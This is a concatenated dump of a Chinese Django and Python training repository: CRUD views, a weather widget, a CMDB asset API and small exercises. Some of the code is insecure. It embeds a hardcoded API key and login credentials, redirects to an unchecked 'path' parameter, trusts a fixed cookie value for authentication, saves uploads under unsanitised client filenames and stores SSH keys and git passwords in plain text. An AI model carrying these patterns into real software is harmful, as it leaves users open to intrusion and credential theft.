web.forms.project import ProjectModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def project_list(request): page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Project.objects.all().count() # 数据库中获取即可 pager = Pagination(page, total_count, request.path_info) depart_queryset = models.Project.objects.all()[pager.start:pager.end] return render(request, 'project_list.html', {'depart_queryset': depart_queryset, 'pager': pager}) def project_add(request): """ 添加项目 :param request: :return: """ if request.method == 'GET': form = ProjectModelForm() return render(request, 'form.html', {'form':form}) form = ProjectModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'project_list')) return render(request, 'form.html', {'form': form}) def project_edit(request,nid): """ 编辑项目 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Project.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = ProjectModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = ProjectModelForm(data=request.POST,instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request,'project_list')) return render(request, 'form.html', {'form': form}) def project_del(request,nid): """ 删除项目 :param request: :param nid: :return: """ origin = memory_reverse(request,'project_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Project.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/deploy/web/forms/project.py from django.forms import ModelForm from web.forms.base import BootStrapModelForm from web import models class ProjectModelForm(BootStrapModelForm): class Meta: model = models.Project fields = "__all__" def __init__(self, *args, **kwargs): super(ProjectModelForm, self).__init__(*args, **kwargs) self.fields['private'].widget.attrs['class'] = '' # 让是否为私有去除样式 <file_sep>/day14/作业/百度天气/js/baidu.js // window.onload=function (ev) { // var cart = document.getElementsByClassName('city','wheater')[0]; // var cart2=document.getElementsByClassName('wheater')[0]; // // cart.onmouseover=function () { // // cart2.style.display='block'; // }; // cart.onmouseout=function () { // cart2.style.display='none'; // // }; // }; $(function () { $.ajax({ url:'https://free-api.heweather.com/s6/weather/forecast?location=beijing&key=7e2f47ead8a94ecab4b9e04f1f8d4a3f', type:'get', success:function (data) { // console.log(data.HeWeather6[0]); // console.log(data.HeWeather6[0].daily_forecast[0].cond_code_d); $('.left-top .tianqi img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[0].cond_code_d+'.png'); $('.one img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[0].cond_code_d+'.png'); $('.there .day1 img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[0].cond_code_d+'.png'); $('.there .day2 img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[1].cond_code_d+'.png'); $('.there .day3 img').attr('src',"./img/"+data.HeWeather6[0].daily_forecast[2].cond_code_d+'.png'); // 日期设置 $('.wheater .two .date').text(data.HeWeather6[0].daily_forecast[0].date);//设置第二行日期 $('.there .day1 .date').text(data.HeWeather6[0].daily_forecast[0].date); $('.there .day2 .date').text(data.HeWeather6[0].daily_forecast[1].date); $('.there .day3 .date').text(data.HeWeather6[0].daily_forecast[2].date); //设置天气文字 $('.there .day1 .wea').text(data.HeWeather6[0].daily_forecast[0].cond_txt_d); $('.there .day2 .wea').text(data.HeWeather6[0].daily_forecast[1].cond_txt_d); $('.there .day3 .wea').text(data.HeWeather6[0].daily_forecast[2].cond_txt_d); //设置温度 $('.left-top .tianqi span').text(data.HeWeather6[0].daily_forecast[0].tmp_min+'℃'); $('.there .day1 .temp').text(data.HeWeather6[0].daily_forecast[0].tmp_min+'℃'); $('.there .day2 .temp_min').text(data.HeWeather6[0].daily_forecast[1].tmp_min ); $('.there .day2 .temp_max').text(data.HeWeather6[0].daily_forecast[1].tmp_max+'℃'); $('.there .day3 .temp_min').text(data.HeWeather6[0].daily_forecast[2].tmp_min); $('.there .day3 .temp_max').text(data.HeWeather6[0].daily_forecast[2].tmp_max+'℃'); }, error:function (err) { console.log(err); } }); $.ajax({ url:'https://free-api.heweather.com/s6/air/now?location=beijing&key=7e2f47ead8a94ecab4b9e04f1f8d4a3f', type:'get', success:function (data){ $('.show-air .show-polution-name').text(data.HeWeather6[0].air_now_city.qlty); $('.show-air .show-polution-num').text(data.HeWeather6[0].air_now_city.pm25); } }); $(".day").click(function () { // location.href="http://www.weather.com.cn/weather/101010100.shtml#7d" window.open("https://www.baidu.com"); }); $('.left-top').mouseover(function () { $(".wheater").stop().slideDown(500); }).mouseout(function () { $(".wheater").stop().slideUp(500); }); $('.wheater').mouseover(function () { $(".wheater").stop().slideDown(500); }).mouseout(function () { $(".wheater").stop().slideUp(500); }); });<file_sep>/day17/lianxi/app01/views.py from django.shortcuts import render, HttpResponse, redirect from app01 import models from django.urls import reverse from django import views from django.http import JsonResponse # Create your views here. # 出版社列表 def publisher_list(request): print(request.COOKIES) v = request.COOKIES.get("hu") if v == "hao": data = models.Publisher.objects.all() return render(request, "publisher_list.html", {"data": data}) else: return redirect("/login/") # 编辑出版社 url传参 # def edit_publisher(request): # # if request.method=="POST": # #获取用户更改的id # edit_id=request.POST.get("id")#从浏览器传的参数获取的id # new_name=request.POST.get("name")#从form表单获取的名字 # #去数据库找到这条记录 # obj1=models.Publisher.objects.get(id=edit_id) # print(obj1.name) # obj1.name=new_name # obj1.save() # # return redirect("/publisher_list/") # return redirect(reverse('list')) # else: # edit_id = request.GET.get("id") # publisher_edit = models.Publisher.objects.get(id=edit_id) # return render(request,"edit_publisher.html",{"obj2":publisher_edit}) # 编辑出版社 动态传参 FBV # def edit_publisher(request,edit_id): # if request.method=="POST": # # new_name=request.POST.get("name")#从form表单获取的名字 # #去数据库找到这条记录 # obj=models.Publisher.objects.get(id=edit_id) # print(obj.name) # obj.name=new_name # obj.save() # return redirect("/publisher_list/") # else: # # publisher = models.Publisher.objects.get(id=edit_id) # return render(request,"edit_publisher.html",{"obj":publisher}) # 编辑出版社 CBV动态传参 class EditPublisher(views.View): def get(self, request, edit_id): obj = models.Publisher.objects.get(id=edit_id) return render(request, "edit_publisher.html", {"obj": obj}) def post(self, request, edit_id): obj = models.Publisher.objects.get(id=edit_id) new_name = request.POST.get("name") # 获取用户输入的新名字 obj.name = new_name obj.save() return redirect(reverse('list')) # 跳到展示页面,用的别名 # 上传文件 class upload(views.View): def get(self, request): return render(request, "upload.html") def post(self, request): file_obj = request.FILES.get("code") # 保存下来 filename = file_obj.name with open(filename, "wb")as f: for i in file_obj.chunks(): f.write(i) return HttpResponse("上传成功") # json格式化 class JsonTest(views.View): def get(self, request): res = {"code": 0, "data": "alex"} res2 = ["alex", "污Sir", "金老板", "小姨妈", "MJJ"] return JsonResponse(res2, safe=False) # 模板语法 def template_test(request): data = ["金老板", "景女神", "MJJ"] # data="" filesize = 12345 import datetime today = datetime.datetime.today() value = "<a href='#'>点我</a>" class Person(object): def __init__(self, name, dream): self.name = name # self.dream=dream def dream(self): return "我的梦想是学好python" pw = Person("bob", "环游世界") return render(request, "template_test.html", { "data": data, "file_size": filesize, "today": today, "value": value, "person": pw }) # csrf 跨站请求 def csrf_test(request): if request.method == "POST": print(request.POST) return HttpResponse("OK") else: return render(request, "csrf_test.html") # book_list def book_list(request): # 去数据库查询所有的书籍 v = request.COOKIES.get("hu") path = request.path_info if v == "hao": data = models.Book.objects.all() return render(request, "book_list.html", {"book_list": data}) else: return redirect("/login/?path=%s" %path) # add_book def add_list(request): if request.method == "POST": name = request.POST.get("title") # print(name) publisher_id = request.POST.get("publisher") publisher_obj = models.Book.objects.get(id=publisher_id) models.Book.objects.create(title=name, publisher_id=publisher_id) return redirect("/book_list/") else: data = models.Publisher.objects.all() return render(request, "add_book.html", {"publisher_list": data}) # del_book def del_book(request, pk): if request.method == "GET": models.Book.objects.get(id=pk).delete() return redirect("/book_list") # edit_book def edit_book(request, pk): if request.method == "GET": book_id = models.Book.objects.get(id=pk) # 获取书的id publisher_obj = models.Publisher.objects.all() # 查出所有的出版社 return render(request, "edit_book.html", {"book": book_id, "publisher_list": publisher_obj}) else: book_obj = models.Book.objects.get(id=pk) # 更改之前的书名字 new_title = request.POST.get("title") new_publisher_id = request.POST.get("publisher") book_obj.title = new_title book_obj.publisher_id = new_publisher_id book_obj.save() return redirect("/book_list/") def login(request): if request.method == "POST": path = request.GET.get("path") print(path) username = request.POST.get("username") pwd = request.POST.get("pwd") if username == "alex" and pwd == "123": if path: rep = redirect(path) else: rep = redirect("/publisher_list/") rep.set_signed_cookie("hu", "hao", salt="ooxx", max_age=7) return rep else: return HttpResponse("用户名或者密码错误") else: # next = request.GET.get("next") # print(next) return render(request, "login.html") <file_sep>/day6/5.组合.py # 组合 # 一个类的对象作为另外一个类对象的属性 # class Person: # def __init__(self,name,sex,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.sex = sex # self.bag = [] # def attack(self,dog): # dog.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, dog.name, dog.name, self.dps, dog.hp)) # # class Dog: # def __init__(self,name,kind,hp,dps): # self.name = name # self.hp = hp # self.dps = dps # self.kind = kind # # def bite(self,person): # person.hp -= self.dps # print('%s打了%s,%s掉了%s点血,剩余%s点血' % (self.name, person.name, person.name, self.dps, person.hp)) # # class Weapon: # def __init__(self,name,price,dps): # self.name = name # self.price = price # self.dps = dps # def kill(self,dog): # dog.hp -= self.dps # # alex = Person('alex','N/A',250,5) # ha2 = Dog('哈士奇','藏獒',15000,200) # # print(alex.name) # roubaozi = Weapon('肉包子',600000,10000) # alex.money = 1000000 # if alex.money >= roubaozi.price: # alex.weapon = roubaozi # alex.weapon.kill(ha2) # print(ha2.hp) # 基础数据类型 都是类 # 'alex' : str的对象 # alex.name = 'alex' # alex.name.startswith('a') #给alex装备一个武器 # 圆形类 --> 圆环类 # 已知圆形类 的基础上 运用组合 求圆环的面积和周长 # 一个类的对象给另一个类对象当属性 # 圆环 # 圆 # 圆环的面积 from math import pi class Circle: def __init__(self,r): self.r = r def area(self): return pi * self.r ** 2 def perimeter(self): return self.r *pi * 2 class Ring: def __init__(self,outside_r,inside_r): self.out_circle = Circle(outside_r) self.in_circle = Circle(inside_r) def area(self): return self.out_circle.area() - self.in_circle.area() def perimeter(self): return self.out_circle.perimeter() + self.in_circle.perimeter() r = Ring(10,5) print(r.area()) print(r.perimeter()) # 组合 是描述了 一种 什么有什么的关系 圆环有圆 人有武器 <file_sep>/day9/线程/回调函数clallback.py #!/usr/bin/env python # -*- coding:utf-8 -*- from concurrent.futures import ThreadPoolExecutor,ProcessPoolExecutor # from multiprocessing import Pool import requests # 需要你安装一下 是一个扩展模块 pip install requests import os def get_page(url): print('<进程%s> get %s' %(os.getpid(),url)) respone=requests.get(url) if respone.status_code == 200: return {'url':url,'text':respone.text} def parse_page(res): res=res.result() print('<进程%s> parse %s' %(os.getpid(),res['url'])) parse_res='url:<%s> size:[%s]\n' %(res['url'],len(res['text'])) with open('db.txt','a') as f: f.write(parse_res) if __name__ == '__main__': # ret = get_page('https://www.baidu.com') # print(ret) urls=[ 'https://www.baidu.com', 'https://www.python.org', 'https://www.openstack.org', 'https://help.github.com/', 'http://www.sina.com.cn/' ] p=ProcessPoolExecutor(3) for url in urls: p.submit(get_page,url).add_done_callback(parse_page) #parse_page拿到的是一个future对象obj,需要用obj.result()拿到结果 <file_sep>/day27/s21crm/crm/templates/public_custom_list.html {% extends 'layout.html' %} {% block content %} <form method="post"> {% csrf_token %} <div> <a href="{% url 'public_customer_add' %}" class="btn btn-success">添加</a> <input type="submit" value="申请到我的私户" class="btn btn-primary"> </div> <table class="table table-bordered"> <thead> <tr> <th>选择</th> <th>姓名</th> <th>联系方式</th> <th>状态</th> <th>转介绍</th> <th>咨询课程</th> <th>操作</th> </tr> </thead> <tbody> {% for row in queryset %} <tr> <td> <input name="pk" type="checkbox" value="{{ row.id }}"> </td> <td>{{ row.name }}</td> <td>{{ row.qq }}</td> <td>{{ row.get_status_display }}</td> <td>{{ row.referral_from.name }}</td> <td> {% for ele in row.courses.all %} <span style="display: inline-block;padding: 5px;border: 1px solid #dddddd;"> {{ ele.name }} </span> {% endfor %} </td> <td> <a href="{% url 'public_customer_edit' row.id %}">编辑</a> <a href="{% url 'public_customer_del' row.id %}">删除</a> </td> </tr> {% endfor %} </tbody> </table> </form> {% endblock %}<file_sep>/day4/7.递归.py # def func(): # print(1) # func() # # func() # 997 /998 # import sys # def foo(n): # print(n) # n += 1 # foo(n) # foo(1) # 6! # print(6*5*4*3*2*1) # def fn(n): # if n == 1:return 1 # return n*fn(n-1) # print(fn(6)) # 递归 就是自己调用自己 # 递归需要有一个停止的条件 # def fn(6): # if 6 == 1:return 1 # return 6*fn(5) # print(fn(6)) # # def fn(5): # return 5*fn(4) # # def fn(4): # return 4*fn(3) # # def fn(3): # return 3*fn(2) # # def fn(2): # return 2*fn(1) # # def fn(1): # return 1 # import sys # sys.setrecursionlimit(5000) # n=0 # def func(): # global n # n+=1 # print(n) # func() # func() ##求年龄 def age(n): # global n # n+=1 if n==4: return 40 elif n>0 and n<4: return age(n+1)+2 print(age(1)) <file_sep>/cmdb/auto_server - 7 - 资产信息入库/api/views.py import json from django.shortcuts import render, HttpResponse from django.views.decorators.csrf import csrf_exempt from django.utils.decorators import method_decorator from django.views import View from api import models from api import service """ @method_decorator(csrf_exempt,name='dispatch') class AssetView(View): # @method_decorator(csrf_exempt) # def dispatch(self, request, *args, **kwargs): # return super().dispatch(request, *args, **kwargs) def get(self,requset,*args,**kwargs): host_list = ['c1.com', 'c2.com', 'c3.com'] return HttpResponse(json.dumps(host_list)) def post(self,request,*args,**kwargs): info = json.loads(request.body.decode('utf-8')) print(info) return HttpResponse('收到了') """ from rest_framework.views import APIView from rest_framework.response import Response class AssetView(APIView): def get(self, requset, *args, **kwargs): host_list = ['c1.com', 'c2.com', 'c3.com'] # return HttpResponse(json.dumps(host_list)) return Response(host_list) def post(self, request, *args, **kwargs): """ 资产汇报的API :param request: :param args: :param kwargs: :return: """ print(request.data) # ###################### agent模式汇报 ###################### result = {'status': True, 'data': None, 'error': None} asset_type = request.data.get('type') if asset_type == 'create': # ################## 增加资产 ################## # 1. 在server表添加数据 server_dict = {} server_dict.update(request.data['basic']['data']) server_dict.update(request.data['cpu']['data']) server_dict.update(request.data['board']['data']) # 新建服务器,server代表新创建的数据 server = models.Server.objects.create(**server_dict) # 2. 硬盘 disk_info = request.data['disk']['data'] for k, v in disk_info.items(): v['server'] = server models.Disk.objects.create(**v) # 3. 网卡 nic_info = request.data['nic']['data'] for k, v in nic_info.items(): print(k, v) v['server'] = server v['name'] = k models.NIC.objects.create(**v) # 4. 内存 memory_info = request.data['memory']['data'] for k, v in memory_info.items(): v['server'] = server models.Memory.objects.create(**v) elif asset_type == 'update': # 更新资产 hostname = request.data['basic']['data']['hostname'] server = models.Server.objects.get(hostname=hostname) service.process_basic(request, hostname) service.process_disk(request, server) service.process_nic(request, server) service.process_memory(request, server) elif asset_type == 'host_update': # 更新资产+更新主机名 # 获取主机名 hostname = request.data['cert'] # 老的主机名 server = models.Server.objects.filter(hostname=hostname) service.process_basic(request, hostname) service.process_disk(request, server) service.process_nic(request, server) service.process_memory(request, server) result['data'] = request.data['basic']['data']['hostname'] return Response(result) <file_sep>/day5/计算器作业/作业1.py import re res = re.compile(r'\([^()]+\)') ##匹配最小单位的括号 input_filter=re.compile('[a-zA-Z]') def check_rede_and_except(s): ##检测表达式里面是否有乘除法 global ret s1=s.replace(' ','') l = re.findall('([\d\.]+|/|-|\+|\*)',s1) ##['100.5', '+', '40', '*', '5', '/', '2', '-', '3', '*', '2', '*', '2', '/', '4', '+', '9'] #print(l) while 1: if '*' in l and '/' not in l: ret = jisuan_rede_and_except(l,'*') #print(l) elif '/' in l and '*' not in l: ret = jisuan_rede_and_except(l,'/') elif '/' in l and '*' in l: a=l.index('*') b=l.index('/') if a<b: ret = jisuan_rede_and_except(l,'*') else: ret = jisuan_rede_and_except(l,'/') else: break #print('我是第二个',l) return jisuan_jia_and_jian(l) def jisuan_rede_and_except(l,x): ##计算乘除 #print("l:%s %s:x" % (l,x)) # print(l) a = l.index(x) if x=='*' and l[a+1] !='-': k=float(l[a-1]) * float(l[a+1]) elif x=='/' and l[a+1] !='-': k=float(l[a-1]) / float(l[a+1]) elif x=='*' and l[a+1] =='-': k=-(float(l[a-1]) * float(l[a+2])) elif x=='/' and l[a+1] =='-': k=-(float(l([a-1])) / float(l[a+2])) del l[a-1],l[a-1], l[a-1] l.insert(a-1,str(k)) #print('我是第一个',l) return l ##['100.5', '+', '100.0', '-', '3.0', '+', '9'] 上面的ret接收到l def jisuan_jia_and_jian(l): ##计算加减 global ret sum = 0 while l: ##l=['100.5', '+', '100.0', '-', '3.0', '+', '9'] i=1,3,5 if l[0] == '-': ##['-','1','+','2'] l[0] = l[0] + l[1] ##l[0]=-1 del l[1] ##把1删除 sum += float(l[0]) for i in range(1, len(l), 2): ##取出l列表里面的加减符号 if l[i] == '+' and l[i + 1] != '-': sum += float(l[i + 1]) elif l[i] == '+' and l[i + 1] == '-': sum -= float(l[i + 2]) elif l[i] == '-' and l[i + 1] == '-': sum += float(l[i + 2]) elif l[i] == '-' and l[i + 1] != '-': sum -= float(l[i + 1]) break return sum def brackets(expression): ##检查是否有括号 if not res.search(expression): # 匹配最里面的括号,如果没有的话,直接进行运算,得出结果 return check_rede_and_except(expression) k = res.search(expression).group() ##取出最小括号里面的值 # print(k) expression = expression.replace(k, str(check_rede_and_except(k[1:len(k) - 1]))) #print(expression) ''' expression结果: 1 - 2 * ( (60-30 +-5.0 * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) ) 1 - 2 * ( (60-30 +-5.0 * 173545.88095238098) - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - (-4*3)/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ (16-3*2) ) 1 - 2 * ( -867699.4047619049 - -12.0/ 10.0 ) 1 - 2 * -867698.2047619049 ''' return brackets(expression) print('我是eval:%s'%(eval('1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )'))) # s= '1 - 2 * ( (60-30 +(-40/5+3) * (9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14 )) - (-4*3)/ (16-3*2) )' #s2='9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14' #print(eval('9-2*5/3 + 7 /3*99/4*2998 +10 * 568/14')) # print(brackets(s)) # # check_rede_and_except(s2) while True: # print("退出请按q\Q") s = input('请输入你想要计算的数字:') a = s.replace(' ','') if input_filter.search(a) or s.count('(') != s.count(')'): print("你输入的表达式有误,请重新输入") continue elif s =='': continue else: print(brackets(a)) # if a == 'q' or a == 'Q': # exit() <file_sep>/day4/优秀的作业/优秀的作业/张晶瑜/homework/readme.txt http://www.cnblogs.com/kuaizifeng/p/8876619.html<file_sep>/cmdb/auto_client - 7 - 资产信息入库/src/plugins/base.py #!/usr/bin/python # -*- coding:utf-8 -*- from config import settings class BasePlugin(object): def __init__(self): self.debug = settings.DEBUG self.base_dir = settings.BASEDIR def get_os(self,handler,host): # return handler.cmd('查看系统的命令',host) return 'linux' def process(self,handler,hostname): os = self.get_os(handler,hostname) if os == 'windows': return self.win(handler,hostname) else: return self.linux(handler,hostname) def win(self,handler,hostname): raise NotImplementedError('win must be implemented ') def linux(self, handler, hostname): raise NotImplementedError('linux must be implemented ')<file_sep>/day27/s21crm/rbac/views/role.py from django.shortcuts import render, redirect from rbac import models from rbac.forms.role import RoleModelForm def role_list(request): """ 部门列表 :param request: :return: """ queryset = models.Role.objects.all() return render(request, 'role_list.html', {'queryset': queryset}) def role_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = RoleModelForm() return render(request, 'role_add.html', {'form': form}) form = RoleModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('role_list') else: return render(request, 'role_add.html', {'form': form}) def role_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Role.objects.filter(id=nid).first() if request.method == "GET": form = RoleModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'role_edit.html', {"form": form}) form = RoleModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('role_list') else: return render(request, 'role_edit.html', {"form": form}) def role_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Role.objects.filter(id=nid).delete() return redirect('role_list') <file_sep>/deploy/web/templatetags/web.py from django.template import Library from django.urls import reverse from django.http import QueryDict register = Library() @register.simple_tag def memory_url(request, name, *args, **kwargs): """ 生成URL(含条件) :return: """ base_url = reverse(name, args=args, kwargs=kwargs) if not request.GET: # 如果获取不到url后面的参数,就返回基本的url return base_url # 实例化一个参数,QueryDict就是负责把多个参数转换成一个参数的 new_query_dict = QueryDict(mutable=True) # 这个是把url后面的多个参数转换成了一个参数,request.GET.urlencode() 是获取url后面的参数 new_query_dict['_filter'] = request.GET.urlencode() # _filter=pagesdf5sdfagesdfsdf1 url = "%s?%s" % (base_url, new_query_dict.urlencode(),) # 最后返回url+后面携带的参数 return url @register.simple_tag def deploy_status(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) # 根据hostID if not deploy_record_object: return '未发布' else: return deploy_record_object.get_status_display() @register.simple_tag def host_version(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) if not deploy_record_object: return '0' else: return deploy_record_object.host_version @register.simple_tag def host_datetime(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) if not deploy_record_object: return '0' else: return deploy_record_object.deploy_time @register.simple_tag def log_info(host_id, deployed_host_dict): deploy_record_object = deployed_host_dict.get(host_id) if not deploy_record_object: return '0' else: return deploy_record_object.log <file_sep>/deploy/web/migrations/0001_initial.py # -*- coding: utf-8 -*- # Generated by Django 1.11 on 2019-01-04 03:17 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Department', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, verbose_name='部门')), ], ), migrations.CreateModel( name='Deploy', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('version', models.CharField(max_length=32, verbose_name='版本')), ('uid', models.CharField(blank=True, max_length=32, null=True, verbose_name='上线文件包名称')), ('status', models.IntegerField(choices=[(1, '未获取'), (2, '待发布'), (3, '已发布'), (4, '已回滚')], default=1, verbose_name='状态')), ], ), migrations.CreateModel( name='DeployRecord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('host_version', models.CharField(max_length=32, null=True, verbose_name='版本')), ('status', models.IntegerField(choices=[(1, '发布中'), (2, '成功'), (3, '失败')], default=1, verbose_name='状态')), ('deploy_time', models.DateTimeField(auto_now_add=True, verbose_name='部署时间')), ('log', models.TextField(verbose_name='日志')), ('deploy', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Deploy', verbose_name='部署任务')), ], ), migrations.CreateModel( name='Host', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hostname', models.CharField(max_length=32, verbose_name='主机名')), ('ssh_port', models.IntegerField(verbose_name='SSH端口')), ], ), migrations.CreateModel( name='Project', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=32, verbose_name='项目名称')), ('git', models.CharField(max_length=128, verbose_name='仓库地址')), ('private', models.BooleanField(default=True, verbose_name='是否私有')), ('online_path', models.CharField(max_length=128, verbose_name='线上项目路径')), ('depart', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Department', verbose_name='部门')), ('hosts', models.ManyToManyField(to='web.Host', verbose_name='关联主机')), ], ), migrations.CreateModel( name='RollbackRecord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('host_version', models.CharField(max_length=32, null=True, verbose_name='版本')), ('status', models.IntegerField(choices=[(1, '发布中'), (2, '成功'), (3, '失败')], default=1, verbose_name='状态')), ('deploy_time', models.DateTimeField(auto_now_add=True, verbose_name='部署时间')), ('rollback_log', models.TextField(verbose_name='日志')), ('deploy', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Deploy', verbose_name='部署任务')), ('host', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Host', verbose_name='主机')), ], ), migrations.CreateModel( name='Script', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('title', models.CharField(max_length=128, verbose_name='标题')), ('interpreter', models.CharField(choices=[('py', 'python3'), ('sh', 'bash')], default='py', max_length=16, verbose_name='解释器')), ('code', models.TextField(verbose_name='上传脚本')), ('rollback_code', models.TextField(null=True, verbose_name='回滚脚本')), ], ), migrations.CreateModel( name='UserInfo', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('username', models.CharField(max_length=32, verbose_name='用户名')), ('password', models.CharField(max_length=64, verbose_name='密码')), ('server_name', models.CharField(max_length=32, verbose_name='SSH用户名')), ('server_private_key', models.TextField(verbose_name='SSH私钥')), ('git_name', models.CharField(max_length=32, verbose_name='git用户名')), ('git_pwd', models.CharField(max_length=32, verbose_name='git密码')), ], ), migrations.AddField( model_name='deployrecord', name='host', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Host', verbose_name='主机'), ), migrations.AddField( model_name='deploy', name='project', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web.Project', verbose_name='项目'), ), migrations.AddField( model_name='deploy', name='script', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='web.Script', verbose_name='script'), ), ] <file_sep>/day7/序列化.py # 什么叫序列化呢? # { '10100011':{'name':,age: ,class:},} # 数据类型 —— 字符串的过程 # 什么时候要用序列化呢? # 数据从内存到文件 # 数据在网络上传输 字节 - 字符串 - 字典 # python中的序列化模块都有哪些? # json 通用的 支持的数据类型 list tuple dict # pickle python中通用的 支持几乎所有python中的数据类型 # shelve python中使用的便捷的序列化工具 ''' #json #dumps和loads是和内存交互的 #dump和load是和文件交互的 import json dic={'k':'v'} # print(type(dic)) # json_dic=json.dumps(dic) # 字典转字符串的过程 ——序列化 # print(json_dic) # print(dic) # print(type(json_dic)) # print(json.loads(json_dic)) #字符串 转回其他数据类型 —— 反序列化 #注意可以dump多次,但是不能多次load # with open('d','w')as f: # json.dump(dic,f) #和文件交互 # # with open('d')as f: # print(json.load(f)) #怎样dump多条数据 # 如果要dump多条数据 # 每一条数据先dumps一下 编程字符串 然后打开文件 write写进文件里 \n # 读取的时候按照标志读取或者按行读 # 读出来之后 再使用loads with open('aaa','w')as f: str_dic=json.dumps(dic) f.write(str_dic+'\n') f.write(str_dic + '\n') f.write(str_dic + '\n') with open('aaa')as f: for line in f: print(json.loads(line.strip())) ''' #pickle import pickle class A: def __init__(self,name): self.name=name alex=A('alex') print(pickle.dumps(alex)) with open('b_pickle','wb')as f: pickle.dump(alex,f) pickle.dump(alex, f) with open('b_pickle','rb')as f: while True: try: obj=pickle.load(f) print(obj.name) except EOFError: break #注意 #1.pickle支持更多的数据类型 # 2.pickle的结果是二进制 # 3.pickle在和文件交互的时候可以被多次load<file_sep>/day15/python连接mysql/mysql连接.py import pymysql user=input('用户名:').strip() pwd=input('密码:').strip() # 连接数据库 conn=pymysql.connect(host='localhost',user='root',password='123',database='user',charset='utf8') # 游标 cursor=conn.cursor() #执行完毕返回的结果集默认以元组显示 # # #执行sql语句 sql="select * from t1 where name=%s and pwd=%s" print(sql) res=cursor.execute(sql,[user,pwd]) #执行sql语句,返回sql查询成功的记录数目 print(res) cursor.close() # conn.close() if res: print('登录成功') else: print('登录失败')<file_sep>/day1/作业_login.py ##1 取出列表里面的字典,然后取字典的值,即用户名和密码 #2 创建一个循环去读用户名和密码,然后和你输入的用户名和密码做比较 #3 如果成功就提示成功并跳出循环 #4 如果不成功会提示重新输入,直到第三次,会提示你在给你三次机会,如果输入要y就重新给你三次机会,否则就退出整个循环 # li = [{'username':'alex','password':'SB'}, {'username':'wusir','password':'sb'}, {'username':'taibai','password':'123'},] a=0 b=0 while a < 3: username = input("请输入你的用户名:") passwd = input("请输入你的密码:") for i in li: if username == i['username'] and passwd == i['password']: print('登录成功') exit() else: print("登录失败请重新登录") a += 1 b += 1 if a == 3:##当第一次的机会用完之后,在给她三次机会 a=0 if b == 6: ##当b=6的时候就已经循环了两次,所有退出占整个循环 print ("你的六次机会已经全部用完,拜拜!") break m=input("还可以给你三次机会,请输入Y:") if m=="Y": continue else: print ("臭不要脸,你已经放弃了在玩三次的机会。") break # 博客地址 http://www.cnblogs.com/huningfei/articles/8692321.html <file_sep>/cmdb/auto_server - 7 - 资产信息入库/相关脚本/1.数据比对.py #!/usr/bin/python # -*- coding:utf-8 -*- disk_info = { '#1':{'factory':'x1','model':'x2','size':600}, '#2':{'factory':'x1','model':'x2','size':500}, '#3':{'factory':'x1','model':'x2','size':600}, '#4':{'factory':'x1','model':'x2','size':900}, } disk_queryset = [ {'slot':'#1','factory':'x1','model':'x2','size':600}, {'slot':'#2','factory':'x1','model':'x2','size':100}, {'slot':'#6','factory':'x1','model':'x2','size':300}, ] disk_info_set = set(disk_info) disk_queryset_set = { row['slot'] for row in disk_queryset } # 找到disk_info有,disk_queryset 无 ---> 应该新增硬盘 r1 = disk_info_set-disk_queryset_set print(r1) # 找到disk_queryset有,disk_info无 ---> 应该删除硬盘 r2 = disk_queryset_set - disk_info_set 